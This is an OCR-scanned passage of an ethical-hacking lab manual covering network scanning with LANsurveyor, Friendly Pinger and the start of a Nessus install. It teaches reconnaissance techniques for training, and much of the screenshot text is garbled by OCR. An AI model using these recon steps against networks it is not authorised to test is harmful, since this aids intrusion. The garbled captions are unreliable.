Ethical Hacking and Countermeasures Copyright O by EC־CoundlAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 155
־ Create A New Network Mapמ
M odule 03 - S can n in g N e tw o rk s
Netuioik Paraneetr
Hops
Eecin Acdres; E rd Address10.00.1 10.D.0.254Enter Ke>t Address Here
(Folowtrg cuter hopj requires SNMP rouier access!
Rotfers. Switches and □her SNMP Device Dijcovery
■-M* 0 SN M Pvl D*v k #j •• SM M P/I Community Strng(*)
ptfefc private ] =&־=
Q S H W P v2c Devices •• SNMPv2c Community Strngfs)
| pubiu. pmats
□ SNK׳Pv3Devbe5 I SNMPv3 Options..
Other IP Service Dixovery
Ivi lANsuveya Fej pender;
LAN survefor Responder Password:1j P
I I Actve Directory DCs
0 IC M P (P r g )
0N el8 ICS Clwvs
M S P Clients
Mapping Speed
FasterSlower0Configuration M aaperon*
I D iscover Configuafon..S ave 0 Kcovety Conf gw a׳ion.
Start Notv»o*k Dioco/cry| Cored
FIGURE 8.5: New Network Map window
6. T h e e n t e r e d I P a d d r e s s mapping process w ill d is p la y a s s h o w n i n t h e f o l lo w in g f ig u re
Mapping Progress
Searching for P nodes
HopO: 10.0.0.1-10.0.0.254
Last Node Contacted:
WIN-D39M R5H L9E 4
SNMP Sends SNMP R ecess: ICMP Ping Sends: ICMP Receipts Subnets Mapped Nodes Mapped Routers Mapped Switches Mapped
Cancel
FIGURE 8.6: Mapping progress window
7 . LANsurveyor d is p la y s d i e m a p o f y o u r n e t w o r k
— LANsurveyor's network discovery discovers aU network nodes, regardless of whether they are end nodes, routers, switches or any other node with an IP address
03 LANsurveyor rs capable of discovering and mappmg multiple VLANs on Layer 2. For example, to map a switch connecting multiple, non- consecutive VLANs
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 156
M odule 03 - S can n in g N e tw o rk s
SclaAVinds LANsurveyor - [M ap 1] | ^ = X
■ Me Edit Manage Monitor Report Tools Avdow Help - Hנ & h a> j 1* 1 51 v s 3 a 0 a s r& ©
♦ ׳ |solarw inds •׳
K H ‘> e © . i d | | י ס ״ ; * v
־־111
O verview f*~|
veisorW1N-DWlllR»lLSt4 WIN D3JI H5H J* «
Wti '.'SilLCM W I Wf.-WSC'tlXMK-O
'•non׳100 9 1
.נ.נ0.0- • .)0.0.255
-
■ V*4 UCONJWRSfWW״MN-LXQN3WRJNSN
10006
12-
Network Segments (1}P Addresses (4)Domain Names (4)Node Names (4) fP ReuterLANsurveyor Responder NodesSNMP NodesSNMP Svntches HubsSIP (V0IPJ NodesLayer i NodesActive Directory DCsGroups
E tf=dff £- 4 Mffc-
hCas*ft
FIGURE 8.7: Resulted network diagram
L a b A n a ly s is
D o c u m e n t all d ie I P a d d re s s e s , d o m a in n a m e s , n o d e n a m e s , I P r o u te r s , a n d S N M P
n o d e s y o u d is c o v e re d d u r in g d ie lab .
T o o l / U t i l i t y I n f o r m a t i o n C o l l e c t e d / O b j e c t i v e s A c l i i e v e d
L A N S u r v e y o r
I P a d d r e s s : 1 0 .0 .0 .1 - 1 0 .0 .0 .2 5 4
I P N o d e s D e t a i l s :
■ S N M P S e n d - 6 2
■ I C M P P in g S e n d ־31
■ I C M P R e c e ip t s 4 ־
■ N o d e s M a p p e d 4 ־
N e t w o r k s e g m e n t D e t a i l s :
■ I P A d d r e s s - 4
■ D o m a i n N a m e s - 4
■ N o d e N a m e s - 4
Q LANsurveyor Responder Clients greatly enhance the functionality of LANsurveyor by providing device inventory and direct access to networked computers.
Ethical Hacking and Countermeasures Copyright O by EC־CoundlAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 157
Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T OT H I S L A B .
M odule 03 - S can n in g N e tw o rk s
Q u e s t io n s
1. D o e s L A N S u iv e y o r m a p e v e ry I P a d d re s s t o i ts c o r r e s p o n d in g s w itc h o r
h u b p o r t?
2 . C a n e x a m in e n o d e s c o n n e c t e d v ia w ire le s s a c c e s s p o in t s b e d e te c te d a n d
m a p p e d ?
I n t e r n e t C o n n e c t i o n R e q u i r e d
□ Yes 0 N o
Platform Supported
0 Classroom 0 iL a b s
Ethical Hacking and Countermeasures Copyright © by EC-CouncilAB Rights Reserved. Reproduction is Strictly Prohibited.
CEH Lab Manual Page 158
M odule 03 - S can n in g N e tw o rk s
Mapping a Network Using Friendly PingerFriendly Pinger is a user-friendly application for netirork administration, monitoring, and inventory.L a b S c e n a r io
111 d ie p r e v io u s la b , y o u f o u n d d ie S N A IP , I C M P P in g , N o d e s M a p p e d , e tc . d e ta ils
u s in g d ie to o l L A N S u iv e y o r . I f a n a t ta c k e r is a b le to g e t a h o ld o f th is in f o rm a t io n ,
h e o r sh e c a n s h u t d o w n y o u r n e tw o r k u s in g S N M P . T h e y c a n a ls o g e t a lis t o f
in te r fa c e s 0 1 1 a r o u t e r u s in g d ie d e f a u l t n a m e p u b lic a n d d is a b le d ie m u s in g d ie re a d - w r ite c o m m u n ity . S N M P M I B s in c lu d e in f o r m a t io n a b o u t th e id e n t i ty o f th e a g e n t 's
h o s t a n d a t ta c k e r c a n ta k e a d v a n ta g e o f d iis in f o r m a t io n to in i t ia te a n a tta c k . U s in g
d ie I C M P r e c o n n a is s a n c e te c h n iq u e a n a t ta c k e r c a n a ls o d e te r m in e d ie to p o lo g y o f
d ie ta r g e t n e tw o rk . A tta c k e rs c o u ld u s e e i th e r d ie I C M P ,’T im e e x c e e d e d " 0 1 ־
" D e s t in a t io n u n re a c h a b le " m e s sa g e s . B o d i o f d ie s e I C M P m e s s a g e s c a n c a u se a
h o s t t o im m e d ia te ly d r o p a c o n n e c t io n .
A s a n e x p e r t Network Administrator a n d Penetration Tester y o u n e e d to d is c o v e r
n e tw o r k to p o lo g y a n d p r o d u c e c o m p r e h e n s iv e n e tw o r k d ia g ra m s f o r d is c o v e re d n e tw o rk s a n d b lo c k a tta c k s b y d e p lo y in g firew a lls 0 1 1 a n e tw o r k to f ilte r u n -w a n te d
tra ffic . Y o u s h o u ld b e a b le to b lo c k o u tg o in g S N M P tra f f ic a t b o r d e r r o u te r s o r
f irew alls . 111 d iis la b , y o u w ill l e a n i to m a p a n e tw o r k u s in g d ie to o l F r ie n d ly P in g e r .
L a b O b je c t iv e s
T h e o b je c t iv e o f d iis la b is to h e lp s tu d e n ts d is c o v e r a n d d ia g ra m n e tw o r k to p o lo g y
a n d m a p a d is c o v e re d n e tw o r k
h i d iis la b , y o u n e e d to :
■ D is c o v e r a n e tw o r k u s in g discovery te c h n iq u e s
■ D ia g ra m th e n e tw o r k to p o lo g y
■ D e te c t n e w d e v ic e s a n d m o d if ic a t io n s m a d e i n n e tw o r k to p o lo g y
■ P e r f o r m in v e n to r y m a n a g e m e n t f o r h a rd w a re a n d s o f tw a re a s s e ts
ICON KEY27 Valuable
information
Test yourknowledge
ס Web exercise
m Workbook review
Ethical Hacking and Countermeasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 159
M odule 03 - S can n in g N e tw o rk s
L a b E n v ir o n m e n t
T o p e r f o r m d ie la b , y o u n e e d :
■ F r ie n d ly P in g e r lo c a te d a r D:\CEH-Tools\CEHv8 Module 0 3 Scanning Networks\Network Discovery and Mapping Tools\FriendlyPinger
■ Y o u can also download die latest version o f Friendly Pinger from the link http://www.kilierich.com/fpi11ge17download.htm
■ I f y o u d e c id e to d o w n lo a d th e la te s t v e r s io n , d ie n s c r e e n s h o ts s h o w n in d ie
la b m ig h t d if fe r
■ A c o m p u t e r r u n n in g Windows Server 2 0 1 2
■ A w e b b r o w s e r w id i I n t e r n e t a c c e s s
■ A d m in is t r a t iv e p riv ile g e s to r u n d ie Friendly Pinger to o l
L a b D u r a t io n
T im e : 10 M in u te s
O v e r v ie w o f N e t w o r k M a p p in g
N e tw o r k m a p p in g is d ie s tu d y o f d ie p h y s ic a l connectivity o f n e tw o rk s . N e tw o r k
m a p p in g is o f t e n c a r r ie d o u t to discover s e rv e rs a n d o p e ra t in g sy s te m s r u i n i n g o n
n e tw o rk s . T h is te c lu i iq u e d e te c ts n e w d e v ic e s a n d m o d if ic a t io n s m a d e in n e tw o r k
to p o lo g y . Y o u c a n p e r f o r m in v e n to r y m a n a g e m e n t f o r h a rd w a re a n d s o f tw a re
a sse ts .
F r i e n d ly P in g e r p e r f o r m s th e f o l lo w in g t o m a p th e n e tw o r k :
■ Monitoring n e t w o r k d e v ic e s a v a i la b i l i ty
■ Notifies i f a n y s e r v e r w a k e s o r g o e s d o w n
■ Ping o f a ll d e v ic e s i n p a r a l le l a t o n c e
■ Audits hardware a n d software c o m p o n e n t s in s ta l le d o n th e c o m p u t e r s
o v e r t h e n e tw o r k
L a b T a s k s
1. In s ta l l F r ie n d ly P in g e r 0x1 y o u r Windows Server 2 0 1 2
2. F o l lo w d ie w iz a rd - d r iv e n in s ta l la t io n s te p s a n d in s ta l l F r ie n d ly P in g e r .
3. L a u n c h th e Start m e n u b y h o v e r in g d ie m o u s e c u r s o r in d ie lo w e r- le f t
c o r n e r o f th e d e s k to p
ZZ7 Tools demonstrated in this lab are available in D:\CEH- Tools\CEHv8 Module 03 Scanning Networks
t a s k 1Draw Network
Map
Ethical Hacking and Countermeasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited.
CEH Lab Manual Page 160
M odule 03 - S can n in g N e tw o rk s
FIGURE 9.1: Windows Server 2012 - Desktop view
4 . C lic k th e Friendly Pinger a p p t o o p e n th e Friendly Pinger w in d o w
S ta rt A d m i n i s t r a t o r ^
Sen*rManager
WindowsPowerSMI
GOOQteChrome
W**r-V Uninstall
r _ m * % &Com piler Control
Panol
V
Hyp«-V
Mac f.inf .
9 «
£Eaplewr
CommandPrompt
! ״ ר
M 02111a Firefox
€ >
PattiA ra^zerPro 2.7i l
■ KmSeorchO. Fnendty
PW^er
O rte f o f l *I G
FIGURE 9.2 Windows Server 2012 - Apps
5 . T h e Friendly Pinger w in d o w a p p e a r s , a n d F r i e n d ly P in g e r p r o m p t s y o u
t o w a tc h a n o n l in e d e m o n s t r a t i o n .
6 . C lic k NoFriendly Pinger [Demo.map]
H1ם
file Edit View Pinq Notification Scan FWatchcr Inventory Help
y - £& □ צ1 a fit ־ *
V Denro ׳*
-
Dem ons tra tio n m ap
Internet M.ui S hull cut Sm vtiS -
WoikStationWorkstation
(*mall)
^ 2 1 /24 /37 & OG 00:35dick the client orco to add ג new device...
FIGURE 9.3: FPinger Main Window
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
^ You are alerted when nodes become unresponsive (or become responsive again) via a variety of notification methods.
Friendly Pinger will display IP-address of your computer and will offer an exemplary range of IP- addresses for scanning
& To see the route to a device, right-click it, select "Ping, Trace" and then "TraceRoute".In the lower part of the map a TraceRoute dialog window will appear.In the process of determination of the intermediate addresses, they will be displayed as a list in this window and a route will be displayed as red arrows on the map
CEH Lab Manual Page 161
7 . S e le c t File f r o m t h e m e n u b a r a n d s e le c t d i e Wizard o p t i o n
L-!»j x ׳
M odule 03 - S can n in g N e tw o rk s
r Friendly Pinger [Demo.map]File | Edit View Ping Notification Scan F/fatdier Inventory Help
ft x !־ % צ*C *י
5T In lan d fr! S c iy c i
Imen-pr Hail Sho itcul SenwrHob -----Mndpn
□ WeA
Gtfr Open...
CtrUN
Ct11+0Reopen
| Uadate
U Save.. Sava At... Close
t b Close All
CtrhUCtfUS
fcV Save A j Image... ^ Print...
gמ
mקד
^ Lock...^ Create Setup...
Ctrl* B
0 Options... F9
X L Frit Alt*■)(
W in k S ta tiu nI 1,11 |
J JW n fk S tA lio n
ar'r;m
O dll initial llldLCiedtFIGURE 9.4: FPinger Staiting Wizard
8. T o c r e a t e in i t ia l m a p p i n g o f t h e n e tw o r k , ty p e a r a n g e o f IP addresses i n s p e c i f ie d f ie ld a s s h o w n i n t h e f o l lo w in g f ig u re c l ic k Next
---Wizard
10.0.0.7Local IP address:
The initial map will be created by query from DNS-server the information about following IP-addresses:
10.0.0.1 •2dYou can specify an exacter range of scanning to speed up
this operation. For example: 10.129-135.1 •5.1 •10
1000| I Timeout
Timeout allows to increase searching, but you can miss some addresses.
X Cancel= ► Mext4 * g a c k? Help
FIGURE 9.5: FPinger Intializing IP address range
9 . T h e n th e w iz a r d w ill s t a r t s c a n n i n g o f IP addresses 1 1 1 d i e n e tw o r k , a n d
l i s t th e m .
1 0 . C lic k Next
ם Scanning allows you to know a lot about your network. Thanks to the unique technologies, you may quickly find all the HTTP, FTP, e-mail and other services present on your network
C] Map occupies the most part of the window. Right- click it. In the appeared contest menu select "Add” and then ״Workstation". A Device configuration dialog window will appear. Specify the requested parameters: device name, address, description, picture
The device is displayed as an animated picture, if it is pinged, and as a black and white picture if it is not pinged
Ethical Hacking and Countermeasures Copyright O by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 162
M odule 03 - S can n in g N e tw o rk s
Wizard
NameIP address
W1N-MSSELCK4K41
Windows8
W1N-LXQN3WR3R9MW1N-D39MR5HL9E4
0 10.0.0.2 0 10.0.0.3
0 10.0.0.5
□ 10.0.0.7
The inquiry is completed. 4 devices found.
Rem ove tick from devices, which you dont want to add on the map
X C a n c e l3 N ► ־ ext4 * B a c k? Help
FPinger 9.6: FPmger Scanning of Address completed
11. Set the default options in the Wizard selection windows and click Next
Wizard
WorkstationQ e v ic e s type:
Address
O Use IP-address
| ® Use DNS-name |
Name
ח Remove DNS suffix
Add* ion
O Add devices to the new map
(•> Add devices to the current map
X Cancel!► Next7 Help
£L) Press CTRL+I to get more information about the created map. You will see you name as the map author in the appeared dialog window
£0 Ping verifies a connection to a remote host by sending an ICMP (Internet Control Message Protocol) ECHO packet to the host and listening for an ECHO REPLY packet. A message is always sent to an IP address. If you do not specify an address but a hostname, this hostname is resolved to an IP address using your default DNS server. In this case you're vulnerable to a possible invalid entry on your DNS (Domain Name Server) server.
FIGURE 9.7: FPinger selecting the Devices type
12. T h e n th e c l i e n t a r e a w ill d is p la y s t h e N e t w o r k m a p in t h e FPinger w in d o w
CEH Lab Manual Page 163 Ethical Hacking and Countermeasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
M odule 03 - S can n in g N e tw o rk s
_ □1 x יV Friendly Pinger [Default.map]File Edit View/ Ping NotificaTion Scan FWatcher inventory Help
H ft J* & g £ <׳״
FIGURE 9.8 FPmger Client area with Network architecture
13 . T o s c a n th e s e le c te d c o m p u t e r i n t h e n e tw o r k , s e le c t d i e c o m p u t e r a n d s e le c t t h e Scan t a b f r o m th e m e n u b a r a n d c l ic k Scan
F riend ly P in ge r [D e fa u lt.m ap ]
Scan FW rtchp Inventory Help
F61 50* mM Scan..
file Edit View Ping Notification
Lb ם - y a * e ?
^ 00:00:47233:1 S i. 3/4/4click the clicnt area to add c new devicc..
FIGURE 9.9: FPinger Scanning the computers in the Network
14. I t d is p la y s scanned details in th e Scanning w iz a r d
ם If you want to ping inside the network, behind the firewall, there will be no problems If you want to ping other networks behind the firewall, it must be configured to let the ICMP packets pass through. Your network administrator should do it for you. Same with the proxy server.
^ You may download the latest release:http: / / www. kilievich.com/ fpinger■
Q Select ״File | Options, and configure Friendly Pinger to your taste.
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 164
M odule 03 - S can n in g N e tw o rk s
Scanning
Command faCompute
W1N-MSSELCK... http://W IN-MSSELCX4M1
W1N-D39MR5H... http://W IN-D39MR5HL9E4
S c a n n in g c o m p le te
J Bescan׳^
Service
& ] HTTP
£ ] HTTP
Progress
y ok X Cancel? Help
£□ Double-click tlie device to open it in Explorer.
FIGURE 9.10: FPinger Scanned results
15 . C l ic k t h e Inventory t a b f r o m m e n u b a r t o v i e w d i e c o n f i g u r a t io n d e ta i ls
o f t h e s e le c te d c o m p u t e r
T ^ r r F־ rien d ly P in ge r fD e fa u lt.m a p lVP k Edit V1«w Ping Notification S<*n FWat<hcr Irvcntory \ Ndp________________
* ׳ \&\ Ca:*BSJ ג1m E l Inventory Option!.״ Ctil-F#
FIGURE 9.11: FPinger Inventory tab
16. T h e General t a b o f t h e Inventory w iz a r d s h o w s d i e computer name a n d in s ta l le d operating system
£□ Audit software and hardware components installed on tlie computers over the network
Tracking user access and files opened on your computer via the network
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 165
M odule 03 - S can n in g N e tw o rk s
InventoryWFile Edit V iew Report O ptions Help
0 S־ ?1 1 ■ Ela e:| g General[ Misc| M'j Hardware] Software{ _v) History| ^ K >
Computer/User
Host name |WIN-D39MR5HL9E4
User name !Administrator
Windows
Name |Windows Server 2012 Release Candriate Datacenter
Service pack
Cotecton tme
Colecbon time 18/22/201211:22:34 AM
WIN-D39MR5HL9E4
FIGURE 9.12: FPinger Inventory wizard General tab
1 7 . T h e Misc t a b s h o w s t h e Network IP addresses. MAC addresses. File System, a n d Size o f t h e d is k s
x 'InventoryFile Edit V iew Report O ptions H e lp
e i g? 0 ₪ *a a <^0G*? fieneraj Misc hardware | Software | History |
Network
IP addresses
MAC addresses
110.0.0.7
D4-BE-D9-C3-CE-2D
Jota l space
Free space
465.42 Gb
382.12 Gb
Display $ettng$
display settings [ 1366x768,60 H z, T rue Color (32 bit)
Disk Type Free, Gb Size, Gb £ File System A
3 C Fixed 15.73 97.31 84 NTFS
S D Fixed 96.10 97.66 2 NTFS— - — ■ —
FIGURE 9.13: FPinger Inventory wizard Misc tab
18. T h e Hardware t a b s h o w s th e h a r d w a r e c o m p o n e n t d e ta i ls o f y o u r
n e tw o r k e d c o m p u t e r s
CQ Assignment of external commands (like telnet, tracert, net.exe) to devices
5 Search of HTTP, FTP, e-mail and other network services
Function "Create Setup" allows to create a lite freeware version with your maps and settings
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 166
M odule 03 - S can n in g N e tw o rk s
TTFile Edit View Report Options Help
0 ^ 1 3 1 0H w 1N-D39MFS5HL9E4|| General Miscl Mi Hardware[^] Software History | < > 1
4x Intel Pentium III Xeon 3093B Memory<2 4096 Mb- Q j B IO S
Q| AT/AT COMPATIBLE DELL • 6222004 02/09/12- £ ) Monitors י
Genetic PnP Monitor- ■V Displays adaptersB j) lnte<R) HD Graphics Family
E O Disk drivesq ST3500413AS (Serial: W2A91RH6)
- ^ Network adapters| j | @netrt630x64.inf,%rtl8168e.devicedesc%^ealtekPQeGBE Family Controller
- ^ S C S I and RA ID [email protected],%spaceport_devicedesc%;Micro$oft Storage Spaces Controller
I JFIGURE 9.14: FPinger Inventory wizard Hardware tab
19 . T h e Software t a b s h o w s d i e in s ta l l e d s o f tw a r e o n d i e c o m p u t e r s
-----------HInventoryFile Edit View Report Options Help
1 0 € 1 Q5r (£]0י3G§* general | M sc \ H«fdware| S׳ Software | History | QBr < >
Adobe Reader X (10.1.3) eMaiTrackerPro EPSON USB Display Friendfy Priger IntelfR) Processor Graphics Java(TM) 6 Update 17Microsoft .NET Framework 4 Multi-Targeting Pack Microsoft Appfcation Error Reporting Microsoft Office Excel MUI (English) 2010 Microsoft Office OneNote MUI (English) 2010 Microsoft Office Outlook MUI (English) 2010 Microsoft Office PowerPoint MUI (English) 2010 Microsoft Office Proof (English) 2010 Microsoft Office Proof (French) 2010 Microsoft Office Proof (Spanish) 2010
Off*** Prnnfirxi (Pnnli^hl ? flirt
A
V
TetaS
Name
Version
Developer
Homepage | ft Go
WIN-D39MR5HL9E4
FIGURE 9.15: FPinger Inventory wizard Software tab
L a b A n a ly s is
D o c u m e n t all d ie I P a d d re s s e s , o p e n a n d c lo s e d p o r t s , s e rv ic e s , a n d p r o to c o ls y o u
d is c o v e re d d u r in g d ie lab .
Q Visualization of your computer network as a beautiful animated screen
Ethical Hacking and Countermeasures Copyright O by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 167
M odule 03 - S can n in g N e tw o rk s
T o o l / U t i l i t y I n f o r m a t i o n C o l l e c t e d / O b j e c t i v e s A c h i e v e d
I P a d d r e s s : 1 0 .0 .0 .1 -1 0 .0 .0 .2 0
F o u n d I P a d d r e s s :
■ 1 0 .0 .0 .2
■ 1 0 .0 .0 .3
■ 1 0 .0 .0 .5
■ 1 0 .0 .0 .7
D e t a i l s R e s u l t o f 1 0 .0 .0 .7 :F r i e n d l v P i n g e rj » ■ C o m p u t e r n a m e
■ O p e r a t i n g s y s te m
■ I P A d d r e s s
■ M A C a d d r e s s
■ F ile s y s te m
■ S iz e o f d is k
■ H a r d w a r e i n f o r m a t i o n
■ S o f tw a r e i n f o r m a t i o n
Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T OT H I S L A B .
Q u e s t io n s
1. D o e s F P in g e r s u p p o r t p ro x y se rv e rs firew alls?
2 . E x a m in e th e p r o g r a m m in g o f la n g u a g e u s e d in F P in g e r .
I n t e r n e t C o n n e c t i o n R e q u i r e d
□ Yes 0 N o
Platform Supported
0 Classroom 0 iL a b s
Ethical Hacking and Countermeasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited.
CEH Lab Manual Page 168
M odule 03 - S can n in g N e tw o rk s
Lab
Scanning a Network Using the Nessus ToolNess/zs allows you to remotely audit a nehvork and deter/nine if it has been broken into or misused in some n ay. It also provides the ability to locally audit a specific machine for vulnerabilities.L a b S c e n a r io
111 th e p r e v i o u s la b , y o u l e a r n e d t o u s e F r i e n d ly P in g e r t o m o n i t o r n e t w o r k
d e v ic e s , r e c e iv e s e r v e r n o t i f i c a t i o n , p in g i n f o r m a t i o n , t r a c k u s e r a c c e s s v ia th e
n e tw o r k , v ie w g r a p h ic a l t r a c e r o u t e s , e tc . O n c e a t t a c k e r s h a v e th e i n f o r m a t io n
r e l a te d t o n e t w o r k d e v ic e s , th e y c a n u s e i t a s a n e n t r y p o i n t t o a n e t w o r k f o r a
c o m p r e h e n s i v e a t t a c k a n d p e r f o r m m a n y ty p e s o f a t t a c k s r a n g in g f r o m D o S
a t t a c k s t o u n a u t h o r i z e d a d m in i s t r a t iv e a c c e s s . I f a t t a c k e r s a r e a b le t o g e t t r a c e r o u t e i n f o r m a t io n , t h e y m i g h t u s e a m e t h o d o l o g y s u c h a s f i r e w a lk in g to
d e te r m i n e th e s e r v ic e s t h a t a r e a l lo w e d t h r o u g h a f ire w a ll .
I f a n a t t a c k e r g a in s p h y s ic a l a c c e s s t o a s w i tc h o r o t h e r n e t w o r k d e v ic e , h e o r
s h e w ill b e a b le to s u c c e s s f u l ly in s ta l l a r o g u e n e tw o r k d e v ic e ; t h e r e f o r e , a s a n
a d m i n i s t r a t o r , y o u s h o u ld d is a b le u n u s e d p o r t s in t h e c o n f i g u r a t io n o f th e
d e v ic e . A ls o , i t is v e r y i m p o r t a n t t h a t y o u u s e s o m e m e t h o d o lo g i e s t o d e t e c t
s u c h r o g u e d e v ic e s 0 1 1 t h e n e tw o r k .
A s a n e x p e r t ethical hacker a n d penetration tester, y o u m u s t u n d e r s t a n d h o w
vulnerabilities, compliance specifications, a n d content policy violations a re
s c a n n e d u s in g th e Nessus to o l .
L a b O b je c t iv e s
T h is la b w ill g iv e y o u e x p e r i e n c e 0 1 1 s c a n n in g th e n e tw o r k f o r v u ln e r a b i l i t ie s ,
a n d s h o w y o u h o w t o u s e N e s s u s . I t w ill t e a c h y o u h o w to :
■ U s e th e N e s s u s t o o l
■ S c a n th e n e t w o r k f o r v u ln e r a b i l i t ie s
I C O N K E Y
7=7־ Valuableinformation
Test yourknowledge
Web exercise
m Workbook review
Ethical Hacking and Countermeasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 169
M odule 03 - S can n in g N e tw o rk s
L a b E n v ir o n m e n t
T o c a n y o u t d i e l a b , y o u n e e d :
■ N e s s u s , l o c a t e d a t D:\CEH-Tools\CEHv8 Module 03 Scanning NetworksWulnerability Scanning Tools\Nessus
■ Y o u c a n a ls o d o w n lo a d th e l a t e s t v e r s io n o f N e s s u s f r o m th e l in k
h t t p : / / w w w . t e n a b l e . c o m / p r o d u c t s / n e s s u s / n e s s u s - d o w n l o a d -
a g r e e m e n t
■ I f y o u d e c id e t o d o w n lo a d th e latest version, t h e n s c r e e n s h o t s s h o w n
i n t h e la b m i g h t d i f f e r
■ A c o m p u t e r r u n n i n g Windows Server 2012
■ A w e b b r o w s e r w i t h I n t e r n e t a c c e s s
■ A d m in i s t r a t i v e p r iv i le g e s t o r u n th e N e s s u s t o o l
L a b D u r a t io n
T im e : 2 0 M in u te s
O v e r v ie w o f N e s s u s T o o l
N e s s u s h e lp s s tu d e n ts t o le a rn , u n d e r s ta n d , a n d d e te r m in e vulnerabilities a n d
weaknesses o f a s y s te m a n d network 111 o r d e r to k n o w h o w a s y s te m c a n b e
exploited. N e tw o r k v u ln e ra b il i t ie s c a n b e network topology a n d OS vulnerabilities, o p e n p o r t s a n d r u n n in g se rv ic e s , application and servicec o n f ig u ra t io n e r r o r s , a n d a p p lic a t io n a n d service vulnerabilities.
L a b T a s k s
1. T o in s ta l l N e s s u s n a v ig a te to D:\CEH-Tools\CEHv8 Module 03 Scanning NetworksWulnerability Scanning Tools\Nessus
2 . D o u b le - c l i c k th e Nessus-5.0.1-x86_64.msi file .
3 . T h e Open File - Security Warning w in d o w a p p e a r s ; c l ic k RunO־ד5ך p en File Se cu rity W arn in g
Do you want to run this fie ?
f J a n e lkgrt\A/ ־ dm inirtra t0r\D etH 0D 'vN ecs1K -5 02-6 C.rrKר&£ Pudsht׳: IcnaMc Network Security Int.
Type Windows Installer PackageFrom; G\U«ra\Adminottatot\Doklop\No>uj*5.0.2-*66 64״
CencHRun
V Always esk cefcre opening the file
Wh Jr fi:« from the Inter net can be useful, this file type can potentially j ) harm >our computer. Only run scfbveic from p ubltihen yen bust.
^ What s the nsk?
£ Tools זdemonstrated in this lab are available in D:\CEH- Tools\CEHv8 Module 03 Scanning Networks
m Nessus is public Domain software related under the GPL.
8 T A s K 1
NessusInstallation
" 7 Nessus is designed to automate the testing and discovery of known security problems.
FIGURE 10.1: Open File ־ Security Warning
Ethical Hacking and Countermeasures Copyright O by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 170
M odule 03 - S can n in g N e tw o rk s
4. T h e Nessus - InstallShield Wizard a p p e a r s . D u r i n g t h e in s ta l la t io n
p r o c e s s , t h e w iz a r d p r o m p t s y o u f o r s o m e b a s ic in f o r m a t io n . F o l lo w
d i e i n s t r u c t io n s . C l i c k Next.
Tenable Nessus (x64) ־ InstallShield Wizard&Welcome to th e InstallShield Wizard for Tenable Nessus (x64)
The InstalSh1eld(R) Wizard wdl nstal Tenable Nessus (x64) on your computer. To continue, ddc Next.
WARNING: Ths program is protected by copyright law and nternational treaties.
< Back Next > Cancel
FIGURE 10.2: The Nessus installation window
5. B e f o r e y o u b e g in in s ta l la t io n , y o u m u s t a g r e e t o t h e license agreement a s s h o w n in t h e f o l lo w in g f ig u re .
6 . S e le c t t h e r a d io b u t t o n t o a c c e p t t h e l ic e n s e a g r e e m e n t a n d c l ic k Next.
Tenable Nessus (x64) - InstallShield Wizard!ל;License Agreement
Please read the following kense agreement carefully.
0
Tenable Network Security, Inc.NESSUS®
software license Agreement
This is a legal agreement ("Agreement") between Tenable Network Security, Inc., a Delaware corporation having offices at 7063 Columbia Gateway Drive. Suite 100, Columbia, MD 21046 (“Tenable"), and you, the party licensing Software (“You״). This Agreement covers Your permitted use of the Software BY CLICKING BELOW YOU !unir.ATF v m iB Ar.r.FPTAMr.F n p tw/.q ArtPFPMFUT auh
Printaccept the terms in the kense agreement O I do not accept the terms n the kense agreement
InstalShiekJ-------------------------------------------
CancelNext >< Back
FIGURE 10.3: Hie Nessus Install Shield Wizard
7 . S e le c t a d e s t in a t io n f o ld e r a n d c l ic k Next.
m The updated Nessus security checks database is can be retrieved with commands nessus-updated- plugins.
Q Nessus has the ability to test SSLized services such as http, smtps, imaps and more.
Nessus security scanner includes NASL (Nessus Attack Scripting Language).
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 171
M odule 03 - S can n in g N e tw o rk s
Tenable Nessus (x64) - InstallShield WizardDestination Folder
Click Next to instal to this folder, or ckk Change to instal to a different folder.
Change...Instal Tenable Nessus (x64) to: C:\Program F*es\Tenable Nessus \£>
InstalShield
CancelNext >< Back
FIGURE 10.4: Tlie Nessus Install Shield Wizard
8. T h e w iz a r d p r o m p t s f o r Setup Type. W i d i d i e Complete o p t i o n , a ll
p r o g r a m f e a tu r e s w ill b e in s ta l le d . C h e c k Complete a n d c l ic k Next.
Tenable Nessus (x64) ־ InstallShield WizardSetup Type
Choose the setup type that best smts your needs.
FIGURE 10.5: The Nessus Install Shield Wizard for Setup Type
9 . T h e N e s s u s w iz a r d w ill p r o m p t y o u t o c o n f i r m th e in s ta l la t io n . C lic k Install
Ibdl Nessus gives you the choice for performing regular nondestructive security audit on a routinely basis.
Q Nessus probes a range of addresses on a network to determine which hosts are alive.
Ethical Hacking and Countermeasures Copyright O by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 172
M odule 03 - S can n in g N e tw o rk s
Tenable Nessus (x64) - InstallShield WizardReady to Install the Program
The wizard is ready to begn nstalation.
Click Instal to begn the nstalatoon.
